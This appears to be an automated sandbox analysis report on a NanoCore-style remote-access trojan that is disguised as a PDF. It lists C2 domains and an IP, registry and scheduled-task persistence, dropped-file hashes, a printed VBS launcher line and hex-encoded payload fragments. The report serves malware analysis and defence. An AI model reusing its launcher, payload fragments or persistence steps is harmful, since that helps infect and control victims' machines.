      behaviorgraph top1 signatures2 2 Behavior Graph ID: 796783 Sample: 026910003102350.pdf.scr.exe Startdate: 02/02/2023 Architecture: WINDOWS Score: 100 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 12 other signatures 2->79 10 026910003102350.pdf.scr.exe 39 2->10         started        14 itugx.exe 2 2->14         started        16 wscript.exe 1 2->16         started        18 7 other processes 2->18 process3 file4 59 C:\Users\user\AppData\Local\...\itugx.exe, PE32 10->59 dropped 89 Starts an encoded Visual Basic Script (VBE) 10->89 20 wscript.exe 1 10->20         started        91 Creates autostart registry keys with suspicious values (likely registry only malware) 14->91 93 Creates multiple autostart registry keys 14->93 22 RegSvcs.exe 14->22         started        24 itugx.exe 16->24         started        26 itugx.exe 18->26         started        28 itugx.exe 18->28         started        30 conhost.exe 18->30         started        32 4 other processes 18->32 signatures5 process6 process7 34 itugx.exe 2 4 20->34         started        38 RegSvcs.exe 24->38         started        40 RegSvcs.exe 26->40         started        42 RegSvcs.exe 28->42         started        file8 57 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 34->57 dropped 81 Antivirus detection for dropped file 34->81 83 Multi AV Scanner detection for dropped file 34->83 85 Found API chain indicative of sandbox detection 34->85 87 3 other signatures 34->87 44 RegSvcs.exe 1 11 34->44         started        signatures9 process10 dnsIp11 67 december2n.duckdns.org 212.193.30.230, 60705 SPD-NETTR Russian Federation 44->67 69 december2nd.ddns.net 44->69 71 192.168.2.1 unknown unknown 44->71 61 C:\Program Files (x86)\...\dhcpmon.exe, PE32 44->61 dropped 63 C:\Users\user\AppData\Roaming\...\run.dat, data 44->63 dropped 65 C:\Users\user\AppData\Local\...\tmp897A.tmp, XML 44->65 dropped 95 Protects its processes via BreakOnTermination flag 44->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 44->97 99 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->99 49 schtasks.exe 1 44->49         started        51 schtasks.exe 1 44->51         started        file12 signatures13 process14 process15 53 conhost.exe 49->53         started        55 conhost.exe 51->55         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      026910003102350.pdf.scr.exe46%ReversingLabsWin32.Trojan.Lisk
      026910003102350.pdf.scr.exe46%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe100%AviraDR/AutoIt.Gen
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe46%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      3.2.RegSvcs.exe.60b0000.7.unpack100%AviraTR/NanoCore.fadteDownload File
      19.2.RegSvcs.exe.d00000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      SourceDetectionScannerLabelLink
      december2nd.ddns.net12%VirustotalBrowse
      december2n.duckdns.org6%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      december2nd.ddns.net12%VirustotalBrowse
      december2n.duckdns.org6%VirustotalBrowse
      december2n.duckdns.org100%Avira URL Cloudmalware
      december2nd.ddns.net100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      		212.193.30.230
      		truetrueunknown
      december2n.duckdns.org
      		212.193.30.230
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      december2nd.ddns.nettrue
      • 12%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      december2n.duckdns.orgtrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.autoitscript.com/autoit3/026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
          		high

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          212.193.30.230
          		december2nd.ddns.netRussian Federation
          		57844SPD-NETTRtrue

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:796783
          Start date and time:2023-02-02 08:08:12 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 13m 40s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:32
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:026910003102350.pdf.scr.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@43/44@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 99.7% (good quality ratio 92.3%)
          • Quality average: 78.7%
          • Quality standard deviation: 29.6%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 185
          • Number of non-executed functions: 223
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          08:10:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:13AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:14Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
          08:10:14API Interceptor602x Sleep call for process: RegSvcs.exe modified
          08:10:15Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
          08:10:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          08:10:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:11:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          212.193.30.230PO.jsGet hashmaliciousBrowse
          • 212.193.30.230:6505/Vre
          payment.jsGet hashmaliciousBrowse
          • 212.193.30.230:7780/is-ready
          PO.jsGet hashmaliciousBrowse
          • 212.193.30.230:6505/Vre
          PO.jsGet hashmaliciousBrowse
          • 212.193.30.230:7780/is-ready
          NewPO.jsGet hashmaliciousBrowse
          • 212.193.30.230:7780/is-ready
          dPFhxftFKAvajay.jsGet hashmaliciousBrowse
          • 212.193.30.230:7975/Vre

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          december2nd.ddns.netOx0YJcdK4s.exeGet hashmaliciousBrowse
          • 212.193.30.230
          IMG_000249230.pdf.scr.exeGet hashmaliciousBrowse
          • 194.5.98.176
          december2n.duckdns.orgjjE6r0O7rF.exeGet hashmaliciousBrowse
          • 212.193.30.230
          Ox0YJcdK4s.exeGet hashmaliciousBrowse
          • 212.193.30.230
          obsERXPYBe.exeGet hashmaliciousBrowse
          • 194.5.98.176
          pu8PvGDGha.exeGet hashmaliciousBrowse
          • 194.5.98.176
          c6U3ESasLi.exeGet hashmaliciousBrowse
          • 194.5.98.176

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          SPD-NETTR8el2WF5ixS.exeGet hashmaliciousBrowse
          • 195.133.40.130
          A3F0B643265E9895B3291658516CE2B34EB06D585BD8E.exeGet hashmaliciousBrowse
          • 212.193.30.115
          OukBj2y5jY.exeGet hashmaliciousBrowse
          • 195.133.40.200
          proof of payment & invoice copy.docx.docGet hashmaliciousBrowse
          • 212.193.30.4
          http://195.133.40.73/bins/Paralysis.armGet hashmaliciousBrowse
          • 195.133.40.73
          invoice89938.exeGet hashmaliciousBrowse
          • 212.193.30.230
          FJsd1qxDgJ.exeGet hashmaliciousBrowse
          • 195.133.40.200
          LhWQCnZEr8.exeGet hashmaliciousBrowse
          • 195.133.40.200
          Comprobant.xlsGet hashmaliciousBrowse
          • 195.133.40.200
          jwlIVLR3d6.exeGet hashmaliciousBrowse
          • 195.133.40.200
          Odeme.xlsGet hashmaliciousBrowse
          • 195.133.40.200
          Comprobante Enero.xlsGet hashmaliciousBrowse
          • 195.133.40.200
          p3TPW34SPc.exeGet hashmaliciousBrowse
          • 195.133.40.200
          Promotion Instruction & Personal Referral Link for YouTube partners.docx.scr.exeGet hashmaliciousBrowse
          • 195.133.40.102
          LiRDJvWMnF.exeGet hashmaliciousBrowse
          • 212.193.30.230
          file.exeGet hashmaliciousBrowse
          • 195.133.40.119
          HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exeGet hashmaliciousBrowse
          • 212.193.30.115
          D677F86403915B15AB62B1278CC7E6A8F2A98DE2BA6A8.exeGet hashmaliciousBrowse
          • 212.193.30.115
          invoice_78336.xlsmGet hashmaliciousBrowse
          • 212.193.30.230
          MPjSUCJrQw.exeGet hashmaliciousBrowse
          • 212.193.30.230

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFwb; Bank Remittance,[90,000,00,].exeGet hashmaliciousBrowse
            683348001 PO.exeGet hashmaliciousBrowse
              DOCS..exeGet hashmaliciousBrowse
                AdobeUpdate.exeGet hashmaliciousBrowse
                  TT Copy -Redacted_Payment Confirmation 20232701.exeGet hashmaliciousBrowse
                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                      PO-0987654567-987654567MNG.exeGet hashmaliciousBrowse
                        attached the document.exeGet hashmaliciousBrowse
                          attacched the document.exeGet hashmaliciousBrowse
                            Pedido de Compra.exeGet hashmaliciousBrowse
                              Order confirmation 223321.exeGet hashmaliciousBrowse
                                PURCHASE LIST.exeGet hashmaliciousBrowse
                                  SHIPPING DOCS. 201002652122.exeGet hashmaliciousBrowse
                                    new order.exeGet hashmaliciousBrowse
                                      SOA.exeGet hashmaliciousBrowse
                                        Bank transfer 23.01.2023.exeGet hashmaliciousBrowse
                                          SOA.exeGet hashmaliciousBrowse
                                            invoice and packing list.exeGet hashmaliciousBrowse
                                              Product list.exeGet hashmaliciousBrowse
                                                INVOICE.exeGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45152
                                                  Entropy (8bit):6.149629800481177
                                                  Encrypted:false
                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: Fwb; Bank Remittance,[90,000,00,].exe, Detection: malicious, Browse
                                                  • Filename: 683348001 PO.exe, Detection: malicious, Browse
                                                  • Filename: DOCS..exe, Detection: malicious, Browse
                                                  • Filename: AdobeUpdate.exe, Detection: malicious, Browse
                                                  • Filename: TT Copy -Redacted_Payment Confirmation 20232701.exe, Detection: malicious, Browse
                                                  • Filename: PURCHASE ORDER.exe, Detection: malicious, Browse
                                                  • Filename: PO-0987654567-987654567MNG.exe, Detection: malicious, Browse
                                                  • Filename: attached the document.exe, Detection: malicious, Browse
                                                  • Filename: attacched the document.exe, Detection: malicious, Browse
                                                  • Filename: Pedido de Compra.exe, Detection: malicious, Browse
                                                  • Filename: Order confirmation 223321.exe, Detection: malicious, Browse
                                                  • Filename: PURCHASE LIST.exe, Detection: malicious, Browse
                                                  • Filename: SHIPPING DOCS. 201002652122.exe, Detection: malicious, Browse
                                                  • Filename: new order.exe, Detection: malicious, Browse
                                                  • Filename: SOA.exe, Detection: malicious, Browse
                                                  • Filename: Bank transfer 23.01.2023.exe, Detection: malicious, Browse
                                                  • Filename: SOA.exe, Detection: malicious, Browse
                                                  • Filename: invoice and packing list.exe, Detection: malicious, Browse
                                                  • Filename: Product list.exe, Detection: malicious, Browse
                                                  • Filename: INVOICE.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):142
                                                  Entropy (8bit):5.090621108356562
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

                                                  Download File
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):142
                                                  Entropy (8bit):5.090621108356562
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\Update.vbs

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):143
                                                  Entropy (8bit):4.963345814111803
                                                  Encrypted:false
                                                  SSDEEP:3:FER/n0eFH5OUkh4E2J5xAIzbgFCdSfNUkh4E2J5xAIzbgbi1A:FER/lFHI923fzbgFeSfN923fzbgb7
                                                  MD5:C3DAE34C95AFBA3A4E22F956B6761EF7
                                                  SHA1:8DD9C50F51E1D8FA7492922AE3E05C8526824D88
                                                  SHA-256:60DFA2FD6C51979E9A3E669F487471408474A5ABB43FFFF5536160401FB0712F
                                                  SHA-512:987681FF2FC61676FE4FDFCBB748740BED5FC64AE9C7087D4D2EB0F492891ABDCBCD34CE2ADBBD50CCB390E098D867C0CE8B1CB4A10C7DD26AB6F1CFF58C821E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls"

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\accdciolx.icm

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):597
                                                  Entropy (8bit):6.186253247413455
                                                  Encrypted:false
                                                  SSDEEP:12:oXEXUz6MlWRGKb57dGZ47amIGP115oCnWRi8UVEpmyvLSoK/:OEXU+71dGG7apGRoYWRizVimyJg
                                                  MD5:9D23B8A8A8DC43EC163438D3E58CDB4E
                                                  SHA1:083823FFA163D66242EC8E04AD9C9A02A3F5F32E
                                                  SHA-256:D249EC95400898681404C2D824E77651C8D8ACFFEBE92F51BC6D337DF11DB895
                                                  SHA-512:ABA25C811AC517981F7F68F803B205E326B89F390E4E4208FE0CA51312EA15F403468C88EBC3C64EDCF8447E377012FCBA100D0BCB04A3BC861FCE041B7EE6D6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\adietmenbj.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):503
                                                  Entropy (8bit):6.217480782110286
                                                  Encrypted:false
                                                  SSDEEP:12:BRE/nyLFn4WfUw7LT6aZXxGOAl54d3JcfZCMJL+VUftgAeryz/:n0YdRlFZwvlUJcfZL+VVqr
                                                  MD5:2732EEA4B454A9C18455717D791AA346
                                                  SHA1:6E3F73A1A0ADEA9FDBAE17F9E0208D6AD08B05EC
                                                  SHA-256:64E99289977F284CE1C930F9E27A813C60C4F379E3E38F845E4EF11703ADE375
                                                  SHA-512:69ADE759606DAF638525F6DACBAD04CD8CCCF724F2D1768CA5B3F16545F937D62B28DA738510BA78FBA83A7190DFAF80A1E19914A027DAFDBFDDEAD655F67FCC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\cgkjjhlj.icm

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):528
                                                  Entropy (8bit):6.181783102675102
                                                  Encrypted:false
                                                  SSDEEP:12:AjJFkEaE4BuYCDwUEY7Yn6eb0yVIHmMY7EC0LuHvZ2ItWDNEpKnFg0T:AjJDZ4BSDwURYn6eb0yVIlIvMqEFv
                                                  MD5:B999711E1C647771E59A27D40F75E908
                                                  SHA1:E1DBE34813EF6241B4B227042649805372321794
                                                  SHA-256:6A9A2E454761426D0B07209E1958C520D008D8EFAABB12CFAFE777C15B0FA562
                                                  SHA-512:7A5783199BB73E284E56A3D4D26268DABC6D1973562D91D4253D3EDA9EBD483F89F9D2545146CDE4935FAFF70F981B5B617CDA7B3A25E769C0C9E44BFCE6B876
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:......................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\chcekckp.gfh

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):407473
                                                  Entropy (8bit):4.048588207938584
                                                  Encrypted:false
                                                  SSDEEP:3072:/JGA8gDqUGMl95jTDOWmA72KRvgr00mvlIRHqsEZipg7O65J48al5plklct4wyNu:h5VGMBJRvgr09nZiq7OIy8az0a4DuP
                                                  MD5:48F9952AAAFE4CA15D39581E78889AC0
                                                  SHA1:569F6FB010FEFB412192A968784DB355B8311853
                                                  SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
                                                  SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:0x4D5*9--3---04---FFFF--_8-------4-----------------------------------08----E/F_*0E-_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24-------5045--4C0/03-*/27E954--------E--E0/0_0/06--C80/--7E0/-----92E70/--2-----2---4--02----2--04-------04--------*-3--02------02-----/--0/----0/--0/------0/-----------038E70/-57----2-2-787*0/-------------------02-0C----------------------------------------------------2---8-----------082--048-----------2E74657874---98C70/--2---0C80/--02--------------2--0602E72656C6F63--0C-----02--02---C*0/-------------4--0422E72737263---787*0/--2-2--7C0/--CC0/-------------4--04----------------074E70/-----48---02-05-E4D6--54/-/-03---CE0/-06CCC4--/8/2------------------------------------------/33-3-5/---0/--//026F35--0*/82E02/62*026F36--0*/E2D0*2606/69//F0*2E332_030*2_F406/69/20*C---330E06/79//F0F3/0706/79//F2032/606/69/20C---0330*06/79/20*8---2E02/62*/72*---033-9-45-------7337--0*/92D28267338--0*/72D26267339--0*/62C242673

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\daitsfsh-waune.icm.vbe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):62820
                                                  Entropy (8bit):6.7478449446190245
                                                  Encrypted:false
                                                  SSDEEP:768:EaauGtmxdbAYaauGtmxdbAXaauGtmxdbAbaauGtmxdbAXaauGtmxdbA9aauGtmxt:NqJ5qJOqJ6qJOqJYqJ7qJrqJ/qJ5
                                                  MD5:F96269E1056B12E82772B66B0884F8A6
                                                  SHA1:C4D4F2D680A1A95B3FE3462A0F2CF80DC5DD8B05
                                                  SHA-256:2A8C2D73D15B644CFCB109F61099B5501C706CD539D885C3929E35F636A886B8
                                                  SHA-512:4A38D9B82454101EC0BAFE7EA472BCDC457724377F6B4277B7BBBEAE362B402C9012B17F0613B46817F5BF80355E005A01A57A6FE85E6EDF7AB90BF654572596
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..'..XU}.}...M......h..)..J...<.]W....C.!..X8:.........'.I.9.0.j.t.6.t.t.6.0.5.1.M.K.7.C.8.7.R.Z.b.z.1.9.5.w.K.8.2.6.2.p.Q.6.9.Z.C.8.5.R.t.8.5.f.....'...!?<.k{.N.3.&g.Q}.S..MS..z.....{.(.5F.9E..vsW...M......'..b.WqRj..8a..PCd...~c..)o.>.?3...._[Rx..Pb.<I...g..F!.x.O..p.rC..S.l~.9M...*^rD=..8x..h..h..8..9..P....'.w.c.b.o.6.t.e.u.K.2.6.5.Z.X.1.w.O.W.3.8.B.t.d.4.E.a.w.1.8.3.V.1.4.3.8.Y.t.0.7.a.6.1.....'.9.Z.0.4.2.8.6.6.s.3.y.T.1.8.R.Z.0.A.e.t.0.X.R.v.4.i.l.1.j.Z.3.v.r.l.L.0.l.5.Q.8.d.....'.X.9.y.T.5.J.k.0.0.5.l.1.7.R.V.x.7.1.6.c.6.6.8.3.Q.y.m.E.u.6.K.2.a.2.h.7.4.6.1.7.6.E.5.x.O.7.....'.J.V.n.3.9.1.Q.I.4.....'.i.4.4.6.2.W.s.6.7.5.r.0.3.9.4.I.9.f.M.7.M.e.9.7.b.A.5.....'.?.z...!]D...Z.l@.^<..z.so...S...w.:...Jc.wP.....Mm.}.VT.~.....'...3......c...)Q.zK...D.X.C..3-....w..H0M.hL..(P...~........\c.5>.B.a.,.&.n.....&..l$3K......Xz...Iq.+U.....E.|.z...i..F#.[M..../\.r}.ZR^.)....c= ..x....'.9.E.7.5.7.p.N.V.0.1.J.6.2.4.a.r.5.....'........)...C.b./..d....Z..c.........'.e^,...

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\dbhplsxd.msc

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):539
                                                  Entropy (8bit):6.237962640598812
                                                  Encrypted:false
                                                  SSDEEP:12:6Dap/0JWG75MfHN4BgfCct6W/9TM3GoUDAPt4RV:6aEWD7dkI96GNDAPt4RV
                                                  MD5:E96279C4B834A0D1348BA98595380443
                                                  SHA1:B6857B68DE2711C498632D7FAE63702F800B29A0
                                                  SHA-256:E9BC070312838661A856486A6D4433C46AB42AD7C18FA0D0D56943838B44F125
                                                  SHA-512:F267F094F2F39B2225238FB02EB1CB99EB176D6F9DC380F75CF59439D0DF6229DD5F3987377BB23D3424C92288DE86D835605CA0EA0162B4EEB2441259119A71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..........................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\dldgexp.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):514
                                                  Entropy (8bit):6.218187584585582
                                                  Encrypted:false
                                                  SSDEEP:12:B/ZQ2hmQ7kCAxtYCU2QXbx0VgIrrkUC7GDAIh7mJbHz+t:B58DbLexFIV4GD3tmpSt
                                                  MD5:06FEEDE36DB05B3D230E3081419A19A2
                                                  SHA1:2D69F4B7F32BB925AA0CE16208F36BF5FE052F19
                                                  SHA-256:76C4B7C04D21D13CA2B8344485033B11A3631C04F9F3F0EF55C466A443EBBEAD
                                                  SHA-512:770031C2511B3A3E41CC0C0906927D5878B797A8FC5CDE7E33D725AC46934DA573F5D19C13C53C11BB1C626FED611ED2F87A377890863DD06F25ABDCA540B5A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\fedenpfm.xml

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):744
                                                  Entropy (8bit):6.252068466825267
                                                  Encrypted:false
                                                  SSDEEP:12:pMzbyFRPpIHRufJX36MPoeyUTPg1vOlZvapSJYzD7xsgvj3IOeEwvnbkSkAQFQov:mzbyFHieJH6rtlmzapSJ47xX7DA/mJ9v
                                                  MD5:5068F342795DD0ABC182D3E210DEA3DC
